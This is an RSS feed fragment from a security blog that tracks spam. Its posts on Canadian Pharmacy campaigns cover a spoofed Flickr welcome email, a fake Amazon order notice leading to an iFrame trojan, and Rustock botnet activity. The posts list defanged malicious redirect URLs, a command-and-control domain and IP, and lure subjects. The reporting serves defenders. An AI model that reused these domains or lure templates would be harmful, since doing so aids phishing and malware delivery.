			<content:encoded><![CDATA[<p>Various brands have been subject to spam campaigns and today Flickr, the photo sharing web site, is now also being abused by spammers.</p>
<p>MX Lab started to intercept messages with the subject &#8220;[Flickr] Welcome!&#8221;, send from a spoofed email address, with an welcome message  from Flickr (see image below).</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100706_flickr_spam.jpg" alt="" width="450" height="683" /></p>
<p>Every link in the message leads to a different URL, even the links behind Terms of Services or the Privacy Policy.</p>
<p>hxxp://mahimatex.com/sanitation.html<br />
hxxp://electricbrochures.com/custodian.html<br />
hxxp://eventosgs.com.ar/climate.html<br />
hxxp://newcivas.altervista.org/overstatements.html<br />
hxxp://complicat.go.ro/modestly.html<br />
hxxp://kankash-g-s.com/chicagoans.html<br />
hxxp://pliki.open-it.pl/deigned.html<br />
hxxp://turismatica.go.ro/grapefruit.html<br />
hxxp://behsood.ir/schedulable.html<br />
hxxp://jpaquino.com/headlines.html<br />
hxxp://awtchiro.com/consulates.html</p>
<p>The web sites above function as a redirect to hxxp://keptoften.com/</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>Each message has different URLs included so these spammers are using a massive amount of domains in this campaign.</p>
<p>I personally do not understand why they are doing this because an Intent Analysis filter, that analyses the included URLs in emails, can blacklist many URLs from these web sites immediatly when investigating one single spam message.</p>
<p>When only using the domain for visiting the sites we get quite often a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy hxxp://pharmacymentalhealth.com (see image below).</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100706_can_neighb_pharma.jpg" alt="" width="450" height="299" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/947/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/947/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/947/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=947&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/07/06/flickr-welcome-message-leads-to-canadian-pharmacy-web-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100706_flickr_spam.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100706_can_neighb_pharma.jpg" medium="image" />
	</item>
		<item>
		<title>Spam campaign from Canadian Pharmacy also contains web based threats</title>
		<link>http://blog.mxlab.eu/2010/02/15/spam-campaign-from-canadian-pharmacy-also-contains-web-based-threats/</link>
		<comments>http://blog.mxlab.eu/2010/02/15/spam-campaign-from-canadian-pharmacy-also-contains-web-based-threats/#comments</comments>
		<pubDate>Mon, 15 Feb 2010 09:46:25 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[HTML exploits]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=766</guid>
		<description><![CDATA[MX Lab detected several email based threats in a spam campaign from Canadian Pharmacy masked as an order confirmation of Amazon. The campaign comes from the spoofed email address Customer Support &#60;***.***@service.amazon.com&#62; and has the possible following subjects (*** numbers will vary): Confirm #*** Confirmation Order #*** Notice #*** Notify #*** Notification #*** Order Confirmation [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=766&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab detected several email based threats in a spam campaign from Canadian Pharmacy masked as an order confirmation of Amazon.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>The campaign comes from the spoofed email address Customer Support &lt;***.***@service.amazon.com&gt; and has the possible following subjects (*** numbers will vary):</p>
<p>Confirm #***<br />
Confirmation Order #***<br />
Notice #***<br />
Notify #***<br />
Notification #***<br />
Order Confirmation #***<br />
Order Notice #***<br />
Order Notify #***<br />
Order Notification #***</p>
<p>The body of the email:</p>
<blockquote><p>Your Order S\n:10444064511 Accepted.<br />
Details hxxp://www.klaudiusz.ramtel.pl/afrikaners.html</p>
<p>Thank you.<br />
Amazon.com Customer Support</p></blockquote>
<p>The campaign is detected yesterday but today we found a few threaths when following the included URLs. One threat was named HTML:iFrame-LZ[Trj] (Avast).</p>
<p>HTML:iFrame-LZ[Trj] is a malicious HTML script that may be downloaded unknowingly by a user when visiting malicious Web sites. The script will make connection to sites to download file(s). As a result, malicious routines of the downloaded files are exhibited on the affected system.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/766/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/766/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/766/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=766&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/02/15/spam-campaign-from-canadian-pharmacy-also-contains-web-based-threats/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>Rustock is back online, spam levels rise again</title>
		<link>http://blog.mxlab.eu/2008/11/25/rustock-is-back-online-spam-levels-rise-again/</link>
		<comments>http://blog.mxlab.eu/2008/11/25/rustock-is-back-online-spam-levels-rise-again/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 09:09:48 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[mccolo]]></category>
		<category><![CDATA[Rustock]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/?p=293</guid>
		<description><![CDATA[UPDATE, Nov 27th: One of the new CnC servers, &#8216;sdx3Fs5B.info&#8217; was resolving to 72.233.114.74 at LayeredTech. FireEye sent an abuse notification to LayeredTech when the CnC servers went online and they have pulled out the server. &#8212;&#8212;&#8212;&#8212;&#8212;- Yesterday, Nov 24, 2008, I noticed a sudden spam rise. When checking some samples I found that the &#8216;Canadian Pharmacy&#8217; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=293&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>UPDATE, Nov 27th: One of the new CnC servers, &#8216;sdx3Fs5B.info&#8217; was resolving to 72.233.114.74 at LayeredTech. FireEye sent an abuse notification to LayeredTech when the CnC servers went online and they have pulled out the server.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Yesterday, Nov 24, 2008, I noticed a sudden spam rise. When checking some samples I found that the &#8216;Canadian Pharmacy&#8217; spam is back and some new image based spam campaigns have been launched.</p>
<p>But the &#8216;Canadian Pharmacy&#8217; spam is where we should focus on. These spam campaigns are being sent by Rustock, so the conclusion is that these guys are back online and in business.</p>
<p>With subjects like Obama.s new plan, Food crisis in California or Bush.s last words they try to get their email opened to see the &#8216;Canadian Pharmacy&#8217; advertisment. URLs, like hxxp://alsi.kugusup.cn or hxxp://ppbka.kugusup.cn will redirect you to hxxp://beautythrow.com/ where the Canadian Pharmacy web site is hosted.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20081125_rustock_is_back.jpg" alt="" width="440" height="393" /></p>
<p>When looking for more information if Rustock is back I found that the Company FireEye Security has posted more details <a href="http://blog.fireeye.com/research/2008/11/rustock-selling-pills-again.html" target="_blank">on their blog</a>.</p>
<p>As expected, the bot admins learned from the shut down of McColo. They can now simply change DNS to make sure that their command and control server still can be accessed.</p>
<p>The new Rustock spam campaign is already having an impact on the spam levels. The image below is the graph for one of my domains and you can see the spam level drop when McColo was taken down. The red line is the global spam level.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20081125_rustock_is_back_2.jpg" alt="" width="440" height="122" /></p>
<p>We have a peak during the weekend, the absence of business emails, and a global spam level between 75% and 85% during the week. Yesterday we had a spam level of 89,4% and at the time of writting this article we are back at 93%. You can see the graph going up again after the re-activation of the Rustock C&amp;C servers.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/293/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/293/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/293/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/293/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/293/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/293/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/293/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/293/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=293&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2008/11/25/rustock-is-back-online-spam-levels-rise-again/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20081125_rustock_is_back.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20081125_rustock_is_back_2.jpg" medium="image" />
	</item>
		<item>
		<title>Canadian Pharmacy spam looks like a mailing</title>
		<link>http://blog.mxlab.eu/2008/10/01/canadian-pharmacy-spam-looks-like-a-mailing/</link>
		<comments>http://blog.mxlab.eu/2008/10/01/canadian-pharmacy-spam-looks-like-a-mailing/#comments</comments>
		<pubDate>Wed, 01 Oct 2008 07:14:33 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>
		<category><![CDATA[drugs]]></category>
		<category><![CDATA[pharmacy]]></category>
		<category><![CDATA[pills]]></category>
		<category><![CDATA[viagra]]></category>

		<guid isPermaLink="false">http://mxlab.wordpress.com/?p=226</guid>
		<description><![CDATA[Most of the time, spam for viagra and other pills from Canadian Pharmacy doesn&#8217;t look so good like this campaign. Their latest spam campaign is rather nice looking and has some tricks to lure the receiver into their trap with an Unsubscribe link, Manage Subscription links and Privacy policy note. They also use different domains [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=226&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Most of the time, spam for viagra and other pills from Canadian Pharmacy doesn&#8217;t look so good like this campaign.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20081001_canadianpharmacy.jpg" alt="" width="340" height="270" /></p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20081001_canadianpharmacy_2.jpg" alt="" width="340" height="265" /></p>
<p>Their latest spam campaign is rather nice looking and has some tricks to lure the receiver into their trap with an Unsubscribe link, Manage Subscription links and Privacy policy note.</p>
<p>They also use different domains and change this quite often during the day to avoid detection by intent analysis techniques.</p>
<p>Using one of these links http://www.voiceold.com/memberservices/remove.php?recipient=info@*****.be&amp;SESSID=51706986E9245C just leads you to a web site and gives the response &#8220;Not Found&#8221;.</p>
<p>I would recommend not doing this because they can easily track your actions on their web site with these links. You will only confirm that your email address is valid by using those links and receive more spam.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/226/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/226/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/226/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/226/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/226/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/226/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/226/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/226/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&amp;blog=574486&amp;post=226&amp;subd=mxlab&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2008/10/01/canadian-pharmacy-spam-looks-like-a-mailing/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20081001_canadianpharmacy.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20081001_canadianpharmacy_2.jpg" medium="image" />
	</item>
	</channel>
</rss>
